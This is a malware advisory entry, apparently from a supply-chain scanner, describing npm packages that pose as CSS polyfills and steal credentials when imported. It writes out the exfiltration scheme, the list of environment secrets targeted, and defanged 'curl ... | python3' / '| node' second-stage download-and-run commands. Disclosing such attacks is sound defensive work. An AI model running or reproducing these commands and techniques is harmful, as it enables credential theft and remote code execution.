css-vvgsze-polyfill@1.0.0
Malicious code in css-vvgsze-polyfill (npm)
Analysis
css-gwqyid-polyfill@1.0.0 and css-vvgsze-polyfill@1.0.0 ship a require-time credential stealer in thunderboltRegistry.js that runs the moment the module is imported. The file first deletes its own entry from require.cache to hide from later inspection, then uses child_process.execSync to run `id`, `id -un`/`whoami`, `env`, and `ifconfig`/`ip addr`, exfiltrating each result over HTTPS GET to hxxps://unl9pgk6ei4uf80n5tf4iktspjvbuzkn9[.]oastify[.]com/ as query parameters (cmd=id, cmd=whoami, cmd=env, cmd=ifconfig, cmd=reverse-shell), plus a beacon=rce-poc call carrying node version, platform and pid, and a site=<hostname> tag. The `env` exfiltration transmits the installer's entire environment, including NPM_TOKEN, GITHUB_TOKEN/GH_TOKEN, AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_SESSION_TOKEN, OPENAI_API_KEY, ANTHROPIC_API_KEY, STRIPE_SECRET_KEY, SLACK_TOKEN, GITLAB_TOKEN, DOCKER_PASSWORD, SENDGRID_API_KEY, TWILIO_AUTH_TOKEN, HF_TOKEN, PYPI_TOKEN, VERCEL_TOKEN, NETLIFY_AUTH_TOKEN, CLOUDFLARE_API_TOKEN, DIGITALOCEAN_TOKEN and CI_REGISTRY_PASSWORD. It then attempts a second-stage download-and-execute: `curl -L hxxps://appsecc[.]com/py | python3` in css-gwqyid-polyfill and `curl -L hxxps://appsecc[.]com/js | node` in css-vvgsze-polyfill. The package's index.js is an empty stub (module.exports = {}) and registry-manifest.min.json maps nine Parastorage/Corvid registry module names (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, autoCompleteRegistry, thunderboltBuilderRegistry, thunderboltPreviewRegistry, and others) to the same payload file, so the package masquerades as a CSS polyfill while impersonating Wix/Corvid registry internals to harvest CI and cloud credentials.
- analyzed by
- Leitwacht
- first seen
- Oct 5, 2026, 11:49 AM
- analyzed
- Oct 5, 2026, 12:28 PM
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.